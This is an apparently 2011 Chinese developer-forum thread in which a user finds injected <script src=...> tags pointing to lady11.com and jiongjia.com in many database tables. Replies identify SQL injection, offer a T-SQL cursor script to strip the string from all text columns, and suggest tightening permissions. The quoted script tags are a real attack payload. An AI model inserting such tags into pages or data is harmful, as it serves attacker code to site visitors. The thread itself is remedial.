22,298
社区成员
发帖
与我相关
我的任务
分享数据库表中存在恶意脚本
今天查看数据库的时候,查看到很多表中存在<script src=http://lady11.com/s.js></script><script src=http://lady11.com/s.js></script><script src=http://lady11.com/s.js></script><script src=http://lady11.com/s.js></script><script src=http://jiongjia.com/c.js></script> 这些信息。。
我想知道这些信息是怎么进去的,如何防止?
我想知道这些信息是怎么进去的,如何防止?
...全文
请发表友善的回复…
发表回复
liuyjcel 2011-03-01
- 打赏
- 举报
防止SQL注入的方法有那些,那位提供一下???
orochi_gao 2011-02-22
- 打赏
- 举报
把数据库角色中Public,或用户其他赋予角色的权限降低,禁止访问系统视图 sys.objects,sys.columns等
叶子 2011-02-22
- 打赏
- 举报
先备份数据库,然后试下这个
declare @t varchar(555),@c varchar(555) ,@inScript varchar(8000)
set @inScript='<script src=http://lady11.com/s.js>' ---要批量替代的内容
declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
open table_cursor
fetch next from table_cursor into @t,@c
while(@@fetch_status=0)
begin
exec('update ['+@t+'] set ['+@c+']=replace(cast(['+@c+'] as varchar(8000)),'''+@inScript+''','''')' )
fetch next from table_cursor into @t,@c
end
close table_cursor
deallocate table_cursor;
Mr_Nice 2011-02-22
- 打赏
- 举报
[Quote=引用楼主 liuyjcel 的回复:]
今天查看数据库的时候,查看到很多表中存在<script src=http://lady11.com/s.js></script><script src=http://lady11.com/s.js></script><script src=http://lady11.com/s.js></script><script src=http://lady11.com/s.js></script><scr……
[/Quote]
被注入了。 赶紧补救。
今天查看数据库的时候,查看到很多表中存在<script src=http://lady11.com/s.js></script><script src=http://lady11.com/s.js></script><script src=http://lady11.com/s.js></script><script src=http://lady11.com/s.js></script><scr……
[/Quote]
被注入了。 赶紧补救。
-晴天 2011-02-22
- 打赏
- 举报
网页程序没有过滤恶意代码的功能.
王向飞 2011-02-22
- 打赏
- 举报
SQL脚本有漏洞
Rotel-刘志东 2011-02-22
- 打赏
- 举报
sql注入了
